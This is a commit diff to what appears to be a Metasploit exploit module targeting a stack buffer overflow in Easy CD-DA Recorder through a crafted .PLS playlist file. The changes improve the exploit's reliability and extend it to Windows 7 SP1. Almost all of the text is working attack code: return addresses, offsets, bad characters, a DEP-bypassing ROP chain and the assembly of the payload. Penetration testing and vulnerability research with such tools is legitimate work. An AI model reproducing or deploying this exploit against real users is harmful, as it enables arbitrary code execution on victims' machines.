Fix and improve reliability

2014-02-11 10:44:58 -06:00 · 2014-02-11 10:44:58 -06:00 · 3717374896
parent e8a3984c85
commit 3717374896
1 changed files with 21 additions and 19 deletions
--- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@ -9,18 +9,17 @@ class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Easy CD-DA Recorder 2007 PLS Buffer Overflow',
+      'Name'           => 'Easy CD-DA Recorder PLS Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in
        Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
-
        By persuading the victim to open a specially-crafted .PLS file, a
        remote attacker could execute arbitrary code on the system or cause
-        the application to crash.
+        the application to crash. This modules has been tested successfully on
+        Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
@ -43,17 +42,21 @@ class Metasploit3 < Msf::Exploit::Remote
      'Platform'       => 'win',
      'Payload'        =>
        {
+          'DisableNops'    => true,
          'BadChars'       => "\x0a\x3d",
-          'Space'    => 2559
+          'Space'          => 2472,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Targets'        =>
        [
-          [ 'Windows XP SP3 (DEP Bypass)',
+          [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
+            # easycdda.exe 3.0.114.0
+            # audconv.dll 7.0.815.0
            {
              'Offset' => 1108,
              'Ret'    => 0x1001b19b  # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
            }
-          ],
+          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jun 7 2010',
@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
    return make_nops(4).unpack("V").first
  end

-  def exploit
+  def rop_nops(n = 1)
+    # RETN (ROP NOP) [audconv.dll]
+    [0x1003d55d].pack('V') * n
+  end

-    rop_nop =
-    [
-      0x1003d55d   # RETN (ROP NOP) [audconv.dll]
-    ].flatten.pack('V*')
+  def exploit

    # ROP chain generated by mona.py - See corelan.be
    rop_gadgets =
@ -100,15 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote
      0x00429692   # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
    ].flatten.pack('V*')

-    sploit =  rand_text_alpha_upper(target['Offset'])
-    sploit << generate_seh_record(target.ret)
-    sploit << rand_text_alpha_upper(80)
-    sploit << rop_nop
-    sploit << rand_text_alpha_upper(4)
+    sploit =  rop_nops(target['Offset'] / 4)
+    sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
+    sploit << [target.ret].pack("V")
+    sploit << rop_nops(22)
    sploit << rop_gadgets
    sploit << make_nops(4)
    sploit << payload.encoded
-    sploit << rand_text_alpha_upper(10000)
+    sploit << rand_text_alpha_upper(10000) # make it crash

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")